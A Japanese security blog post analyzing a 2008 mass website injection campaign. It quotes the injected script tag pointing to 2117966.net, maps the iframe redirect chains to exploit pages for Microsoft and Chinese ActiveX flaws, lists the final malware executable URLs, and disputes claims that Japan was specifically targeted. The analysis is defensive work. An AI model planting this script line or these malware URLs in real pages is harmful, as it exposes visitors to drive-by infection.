忍者ブログ

ハルファ紀行

2117966.netその1

FC2ブログとはあまり関係ありませんが、とりあえず。
JPCERT/CC2008年3月14日注意喚起

世界中のサイトで大規模に以下のscriptが仕込まれています
("2117966.net"で検索してみましょう)。
<script src="http://www.2117966.net/fuckjp.js"></script>
トレンドマイクロに仕掛けられていたのもこれです。
このスクリプトはいくつかのiframeが入れ替わります
(自動で、あるいは犯人の気まぐれで)。

iframeその1
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/q.htm

iframeその2
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/cuteqq.htm

iframeその3
http://www.2117966.net/fuckjp.js
→http://count.lljy.org/b/

また、iframeその3にはさらにiframeがあります。
iframeその4
http://count.lljy.org/b/
→http://biej8fanwo.a141.71one.com/wow/guowai.htm

iframeその1
http://www.2117966.net/q.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/Ms06067.gif
→http://www.2117966.net/Ms07004.htm
→http://www.2117966.net/Pps.gif
→http://www.2117966.net/Real.gif

iframeその2
http://www.2117966.net/cuteqq.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Bfyy.gif
→http://www.2117966.net/Lz.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/QVod.htm
→http://www.2117966.net/Real.gif
→http://www.2117966.net/XunLei.gif

iframeその3
http://count.lljy.org/b/
→http://count.lljy.org/b/Ajax.gif
→http://count.lljy.org/b/Ms06014.htm
→http://count.lljy.org/b/Ms06067.js
→http://count.lljy.org/b/Ms07004.html
→http://count.lljy.org/b/Real.js
→http://count.lljy.org/b/Yahoo.Php

iframeその4
http://biej8fanwo.a141.71one.com/wow/guowai.htm
→http://biej8fanwo.a141.71one.com/wow/Ajax.gif
→http://biej8fanwo.a141.71one.com/wow/Ms06014.htm
→http://biej8fanwo.a141.71one.com/wow/Ms06067.gif
→http://biej8fanwo.a141.71one.com/wow/Ms07004.htm
→http://biej8fanwo.a141.71one.com/wow/Real.gif
→http://biej8fanwo.a141.71one.com/wow/Yahoo.php

最終的にアンチウイルスが検出・駆除すべきウイルスは以下の4匹です。
http://www.2117966.net/1.exe
http://www.2117966.net/xp.exe
http://count.lljy.org/b/a.exe
http://biej8fanwo.a141.71one.com/wow/wow.exe

わかりやすいファイル名になっていますが、念のためそれぞれを見てみましょう。
ms06014 MS06-014、MDACです。
ms06067 MS06-057の間違いです。MS06-057、WebViewFolderIcon(WEBVW.DLL)です。
ms07004 MS07-004、VML(VGX.DLL)です。
ajax MS06-014、MDACです。
bfyy 暴風(BaoFeng)です(中国)。
lz HanGameCn(韓国ハンゲームの中国向けコントロール)です(中国)。
pps PPStreamです(中国)。
qvod QvodPlayerです(中国)。
real RealPlayerです。
xunlei 迅雷(Xunlei)です(中国)。
yahoo Yahoo!MessengerというかYahoo!MusicJukeboxです。

以上10個の脆弱性は全てActiveXコントロールを使うためIEでしか動作しません。
10個のActiveXコントロールのうちMicrosoft製は3個です(これらの脆弱性は全てWindowsUpdateで阻止できます)。
残り7個のサードパーティ製のうち世界で通用するのはわずかに2個(RealとYahoo!)で、
残り5個は中国内でしか使われていません(これらの脆弱性の阻止については各アプリケーションの製造元に(略))。
ターゲットは中国内外を問わず無差別であることがわかります。

冒頭で書いたとおり世界中のサイトで大規模に仕込まれています。
日本をターゲットとするのならジャストシステムなどのアプリケーションを狙うでしょうし、
海外のいかなる記事も特に日本をターゲットとするような記述はありません。

何が言いたいのかというとですね。

「fuckjp」というファイル名を根拠に「日本をターゲット」と書いたんですか?
LAC2008年3月12日注意喚起
PR

コメント

カレンダー

08 2024/09 10
S M T W T F S
1 2 3 4 5 6 7
8
 9
10
 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30

リンク

管理画面
新しい記事を書く

カテゴリー

未選択 ( 0 )
ウイルス ( 196 )
PC ( 496 )

フリーエリア

最新コメント

感謝
[09/14 ヨシノ]
無題
[10/19 Dolly]
無題
[08/22 まとめ臨時。]

最新記事

PDF Flash
(09/10)
Firefox ESR
(09/08)
PDF
(08/27)
PDF
(08/13)
PDF
(08/07)

最新トラックバック

プロフィール

HN:
Ilion
性別:
非公開

バーコード

RSS

RSS 0.91
RSS 1.0
RSS 2.0

ブログ内検索

アーカイブ

2024 年 09 月 ( 2 )
2024 年 08 月 ( 3 )
2024 年 07 月 ( 4 )
2024 年 06 月 ( 4 )
2024 年 05 月 ( 2 )

最古記事

dda3.netその1
(03/13)
hellh.netその1
(03/13)
dda3.netその2
(03/14)
hellh.netその2
(03/14)
dda3.netとhellh.netその3
(03/14)